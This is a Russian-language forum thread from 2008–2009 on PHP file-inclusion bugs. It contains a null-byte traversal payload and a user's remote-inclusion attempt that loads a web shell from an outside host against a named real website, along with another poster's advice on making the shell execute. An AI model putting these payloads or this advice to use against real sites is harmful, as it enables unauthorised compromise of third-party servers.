ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.11.2008, 17:11
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872
Репутация:
186
|
|
чтобы обойти всю эту иньекцию достаточно выключить register_globals
|
|
|
10.11.2008, 17:13
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 244
Провел на форуме:
963613
Репутация:
428
|
|
чтобы не париться на счет инъекций, можно убить себя.
|
|
|
|
10.11.2008, 17:26
|
|
Постоянный
Регистрация: 19.02.2008
Сообщений: 438
Провел на форуме:
956872
Репутация:
186
|
|
а чтобы инклудиться на другие сайты, параметр include_path должен быть включён (php.ini), а он отключён по стандарту, как и register_globals
`````````````````
Статья старая, но раньше она была актуальна, bombeg, не надо поднимать переполох
Последний раз редактировалось Ru}{eeZ; 10.11.2008 в 17:32..
|
|
|
|
10.11.2008, 20:07
|
|
Познающий
Регистрация: 18.08.2008
Сообщений: 45
Провел на форуме:
418790
Репутация:
64
|
|
Можно попробывать с нулевым байтов (%00) - это сделает возможным просмотреть файлы с разрешением отличным от .htm,(пример index.php?page=../index.php%00) но… такое уже редко встречается.
Насколько мне известно, файлы с расширением .php посмотреть всёравно не получиться, потому-что "The include() statement includes and evaluates the specified file. " (http://ua.php.net/include/).
p.s. чёрт, только щас заметил, что статья 2005-го года =))))
Последний раз редактировалось winterfrost; 10.11.2008 в 20:13..
|
|
|
|
12.11.2008, 00:27
|
|
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме:
555326
Репутация:
47
|
|
Блин ещё бы кто написал статейку про sql injection вообще шикарно бы было!
|
|
|
|
12.11.2008, 14:42
|
|
Постоянный
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
|
|
|
|
12.11.2008, 15:06
|
|
Познающий
Регистрация: 20.05.2008
Сообщений: 78
Провел на форуме:
555326
Репутация:
47
|
|
Сообщение от Solide Snake
ммм... спасибо 
|
|
|
|
20.02.2009, 23:13
|
|
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539
Репутация:
53
|
|
А что делать если стоит фильтрация на \ : . - вообщем на "плохие" символы?
|
|
|
|
13.10.2009, 10:58
|
|
Новичок
Регистрация: 06.10.2009
Сообщений: 3
Провел на форуме:
76901
Репутация:
0
|
|
Plizzz help
Такая фигня, http://www.prodisney.ru/index.php?page=http://nabstre.tu2.ru/shell.php но показывает дерикторию моего сайта а не этого что делать???
|
|
|
|
16.10.2009, 10:22
|
|
Новичок
Регистрация: 25.01.2008
Сообщений: 5
Провел на форуме:
9419
Репутация:
2
|
|
Во первых скрипт на твоем сайте должен быть не исполняемым, то есть txt файл к примеру.
Либо вообще без расширения, то есть так:
index.php?page=http://nabstre.tu2.ru/shell.txt?
Потому что если файл исполняемый, то он исполнятся будет на твоем сервере, а на выходе будет уже результат. Поэтому выводится содержание директории на твоем сервере.
Во вторых конкретно на этом сайте бага не работает, скрипт не инклюдит файлы, а выводит их содержание.
Так что облом.
Последний раз редактировалось Rezak; 16.10.2009 в 10:27..
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Books PHP
|
FRAGNATIC |
PHP |
186 |
21.02.2010 02:41 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для S[N]EP](/avatars/avatar64392.jpg?1128099){kind=avatar}
Комбинированный вид